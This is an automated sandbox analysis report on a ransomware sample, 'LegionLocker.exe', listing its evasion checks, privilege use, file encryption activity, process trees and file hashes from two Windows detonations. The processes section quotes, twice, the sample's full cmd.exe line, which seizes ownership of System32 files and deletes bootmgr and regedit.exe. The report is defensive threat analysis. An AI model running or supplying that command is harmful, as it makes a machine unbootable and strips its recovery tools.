Malware Analysis Report

2024-11-13 18:04

Sample ID 241105-pkf8xa1brf
Target Ransomware LegionLocker.exe
SHA256 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412
Tags themida discovery evasion exploit ransomware spyware stealer trojan
Score 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score 10/10

SHA256

369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412

Threat Level: Known bad

The file Ransomware LegionLocker.exe was found to be: Known bad.

Malicious Activity Summary

themida discovery evasion exploit ransomware spyware stealer trojan

Renames multiple (465) files with added filename extension

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Renames multiple (153) files with added filename extension

Disables Task Manager via registry modification

Possible privilege escalation attempt

Modifies file permissions

Reads user/profile data of web browsers

Themida packer

Checks computer location settings

Checks BIOS information in registry

Checks whether UAC is enabled

Suspicious use of NtSetInformationThreadHideFromDebugger

Unsigned PE

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-05 12:23

Signatures

Themida packer

themida
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |

Unsigned PE

| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-05 12:23

Reported

2024-11-05 12:25

Platform

win7-20240708-en

Max time kernel

140s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe"

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | N/A |

Renames multiple (153) files with added filename extension

ransomware

Disables Task Manager via registry modification

evasion

Possible privilege escalation attempt

exploit
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |

Checks BIOS information in registry

| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | N/A |

Modifies file permissions

discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |

Checks whether UAC is enabled

evasion trojan
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | N/A |

Suspicious use of NtSetInformationThreadHideFromDebugger

| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | N/A |

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\takeown.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\takeown.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\takeown.exe | N/A |

Suspicious use of AdjustPrivilegeToken

| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |

Suspicious use of WriteProcessMemory

| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 1724 wrote to memory of 1908 | N/A | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 1724 wrote to memory of 1908 | N/A | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 1724 wrote to memory of 1908 | N/A | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 1724 wrote to memory of 1908 | N/A | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 1908 wrote to memory of 2220 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\takeown.exe |
| PID 1908 wrote to memory of 2220 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\takeown.exe |
| PID 1908 wrote to memory of 2220 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\takeown.exe |
| PID 1908 wrote to memory of 2220 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\takeown.exe |
| PID 1908 wrote to memory of 2284 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\icacls.exe |
| PID 1908 wrote to memory of 2284 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\icacls.exe |
| PID 1908 wrote to memory of 2284 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\icacls.exe |
| PID 1908 wrote to memory of 2284 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\icacls.exe |
| PID 1908 wrote to memory of 588 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\takeown.exe |
| PID 1908 wrote to memory of 588 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\takeown.exe |
| PID 1908 wrote to memory of 588 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\takeown.exe |
| PID 1908 wrote to memory of 588 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\takeown.exe |
| PID 1908 wrote to memory of 636 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\icacls.exe |
| PID 1908 wrote to memory of 636 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\icacls.exe |
| PID 1908 wrote to memory of 636 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\icacls.exe |
| PID 1908 wrote to memory of 636 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\icacls.exe |
| PID 1908 wrote to memory of 844 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\takeown.exe |
| PID 1908 wrote to memory of 844 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\takeown.exe |
| PID 1908 wrote to memory of 844 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\takeown.exe |
| PID 1908 wrote to memory of 844 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\takeown.exe |

Processes

C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe

"C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && Exit

C:\Windows\SysWOW64\takeown.exe

takeown /f C:\Windows\System32

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\System32 /grant Admin:F

C:\Windows\SysWOW64\takeown.exe

takeown /f C:\Windows\System32\drivers

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\System32\drivers /grant Admin:F

C:\Windows\SysWOW64\takeown.exe

takeown /f C:\Windows\System32\LogonUI.exe

Network

N/A

Files

memory/1724-0-0x0000000000F60000-0x0000000001790000-memory.dmp

memory/1724-1-0x0000000075201000-0x0000000075202000-memory.dmp

memory/1724-8-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-10-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-9-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-7-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-6-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-5-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-4-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-3-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-2-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-20-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-22-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-19-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-18-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-17-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-16-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-15-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-14-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-13-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-12-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-11-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-25-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-27-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-26-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-28-0x0000000000F60000-0x0000000001790000-memory.dmp

memory/1724-29-0x0000000000F60000-0x0000000001790000-memory.dmp

memory/1724-30-0x00000000751F0000-0x0000000075300000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\HOW-TO-DECRYPT.TXT

MD5 f2bbb85d6112bd7360a4ddbc23ea9a8b
SHA1 683eb7b2b0a5904337f204f71d25c02b9cc5daba
SHA256 be548e310dab08ae249c6d20ba64034d4f3568365d4d31e1f1262abb6c3f33f2
SHA512 a2bae503e9d18fc9bf1e981d2ec074f389a11e51e385f8701a14bc580c95b6c5f907baf9c7bf55e610d1582951fe7d93121b154fe532df6699389a77fcf6b172

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000005.log

MD5 2caa6f3c95f6ec6bba5b54344938efa0
SHA1 2d5637f50e858fbaaeec7853d944dd3c3e91ec39
SHA256 16ef853f2adc432c54ad75d0db8169be845065f65b6c5136eaafdcbe698ac1e6
SHA512 4141715b1d3a28a5fae1e3a1613cca697d07e24808da2b679abc5235d5a181799f35a0ce090ead8dcc133c3b7b7435b9805a3b9bc5eaca4f7167dab7c93d3e00

memory/1724-286-0x0000000000F60000-0x0000000001790000-memory.dmp

memory/1724-287-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-326-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-325-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-324-0x0000000075201000-0x0000000075202000-memory.dmp

memory/1724-328-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-327-0x00000000751F0000-0x0000000075300000-memory.dmp

memory/1724-329-0x00000000751F0000-0x0000000075300000-memory.dmp

C:\Users\Admin\Documents\RevokeUnpublish.xlsx

MD5 98320b7eb431a4d989a4cd3031e723b9
SHA1 7b59bc263c75bf899d4302d236b1c3806d87e3d1
SHA256 6591551d4d97286fb4d1af05cf82289fe0ef690b46c52e88458cf1d8d8ef580b
SHA512 27487d804f4162ef39bd0bdeccfe6b927b40ee2fea612af35982ff72a37ce823651d04a0037814fd63b3e71c28082196f2f3d31eb916e3bef6cf937804db9167

memory/1724-403-0x00000000751F0000-0x0000000075300000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-05 12:23

Reported

2024-11-05 12:25

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe"

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | N/A |

Renames multiple (465) files with added filename extension

ransomware

Disables Task Manager via registry modification

evasion

Possible privilege escalation attempt

exploit
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |

Checks BIOS information in registry

| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | N/A |

Checks computer location settings

| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | N/A |

Modifies file permissions

discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |

Checks whether UAC is enabled

evasion trojan
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | N/A |

Suspicious use of NtSetInformationThreadHideFromDebugger

| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | N/A |

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\takeown.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\takeown.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\takeown.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |

Suspicious use of AdjustPrivilegeToken

| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |

Suspicious use of WriteProcessMemory

| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 3928 wrote to memory of 2344 | N/A | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 3928 wrote to memory of 2344 | N/A | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 3928 wrote to memory of 2344 | N/A | C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2344 wrote to memory of 1748 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\takeown.exe |
| PID 2344 wrote to memory of 1748 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\takeown.exe |
| PID 2344 wrote to memory of 1748 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\takeown.exe |
| PID 2344 wrote to memory of 4132 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\icacls.exe |
| PID 2344 wrote to memory of 4132 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\icacls.exe |
| PID 2344 wrote to memory of 4132 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\icacls.exe |
| PID 2344 wrote to memory of 4864 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\takeown.exe |
| PID 2344 wrote to memory of 4864 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\takeown.exe |
| PID 2344 wrote to memory of 4864 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\takeown.exe |
| PID 2344 wrote to memory of 704 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\icacls.exe |
| PID 2344 wrote to memory of 704 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\icacls.exe |
| PID 2344 wrote to memory of 704 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\icacls.exe |
| PID 2344 wrote to memory of 3680 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\takeown.exe |
| PID 2344 wrote to memory of 3680 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\takeown.exe |
| PID 2344 wrote to memory of 3680 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\takeown.exe |

Processes

C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe

"C:\Users\Admin\AppData\Local\Temp\Ransomware LegionLocker.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && Exit

C:\Windows\SysWOW64\takeown.exe

takeown /f C:\Windows\System32

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\System32 /grant Admin:F

C:\Windows\SysWOW64\takeown.exe

takeown /f C:\Windows\System32\drivers

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\System32\drivers /grant Admin:F

C:\Windows\SysWOW64\takeown.exe

takeown /f C:\Windows\System32\LogonUI.exe

Network

| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.30.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 10.30.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 13.173.189.20.in-addr.arpa | udp |

Files

memory/3928-0-0x0000000000720000-0x0000000000F50000-memory.dmp

memory/3928-1-0x0000000076A10000-0x0000000076A11000-memory.dmp

memory/3928-4-0x00000000769F0000-0x0000000076AE0000-memory.dmp

memory/3928-6-0x00000000769F0000-0x0000000076AE0000-memory.dmp

memory/3928-5-0x00000000769F0000-0x0000000076AE0000-memory.dmp

memory/3928-3-0x00000000769F0000-0x0000000076AE0000-memory.dmp

memory/3928-2-0x00000000769F0000-0x0000000076AE0000-memory.dmp

memory/3928-7-0x00000000769F0000-0x0000000076AE0000-memory.dmp

memory/3928-8-0x00000000769F0000-0x0000000076AE0000-memory.dmp

memory/3928-11-0x0000000000720000-0x0000000000F50000-memory.dmp

memory/3928-12-0x0000000000720000-0x0000000000F50000-memory.dmp

memory/3928-13-0x00000000061F0000-0x0000000006794000-memory.dmp

memory/3928-14-0x0000000005C40000-0x0000000005CD2000-memory.dmp

memory/3928-15-0x0000000005D00000-0x0000000005D0A000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\HOW-TO-DECRYPT.TXT

MD5 f2bbb85d6112bd7360a4ddbc23ea9a8b
SHA1 683eb7b2b0a5904337f204f71d25c02b9cc5daba
SHA256 be548e310dab08ae249c6d20ba64034d4f3568365d4d31e1f1262abb6c3f33f2
SHA512 a2bae503e9d18fc9bf1e981d2ec074f389a11e51e385f8701a14bc580c95b6c5f907baf9c7bf55e610d1582951fe7d93121b154fe532df6699389a77fcf6b172

memory/3928-64-0x0000000000720000-0x0000000000F50000-memory.dmp

memory/3928-101-0x00000000769F0000-0x0000000076AE0000-memory.dmp

memory/3928-102-0x00000000769F0000-0x0000000076AE0000-memory.dmp

memory/3928-136-0x0000000076A10000-0x0000000076A11000-memory.dmp

memory/3928-173-0x00000000769F0000-0x0000000076AE0000-memory.dmp

memory/3928-316-0x00000000769F0000-0x0000000076AE0000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log

MD5 2caa6f3c95f6ec6bba5b54344938efa0
SHA1 2d5637f50e858fbaaeec7853d944dd3c3e91ec39
SHA256 16ef853f2adc432c54ad75d0db8169be845065f65b6c5136eaafdcbe698ac1e6
SHA512 4141715b1d3a28a5fae1e3a1613cca697d07e24808da2b679abc5235d5a181799f35a0ce090ead8dcc133c3b7b7435b9805a3b9bc5eaca4f7167dab7c93d3e00

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\winword.exe_Rules.xml

MD5 89b6590fcb9080db24875fa671b516ca
SHA1 20e472ccdba84d504e087418e703073f44c4f2d9
SHA256 d883bdee08b17e451d3be046fd7cd7b9c816c37f72fa123ca1c13c81e9fcd5ac
SHA512 3eea6d9796596d9d491b2fa1de794c33bda6447e11c611d769c32da6bd62f25d4b7b13748e70a601ae70f45eb36463d7080e16fcf80571e693109d9395345ee0

C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\settings.dat

MD5 5090259c42fc6263bc00e952846280e8
SHA1 9bf53e854027c9dec3b25ff1164e88872c71f66e
SHA256 a05288aa086504a20d2a3177854f8eb158778756ebc24dcfca266c52fa8d5a17
SHA512 8b44fb8fade639c6b4d4b1f8747a8176652700a16b38e43f5f74403c2af0882fb6095986f8e4d94f3d5a242e8d49ed99a03361c01469c8c6a7bf7a7c3527ec7f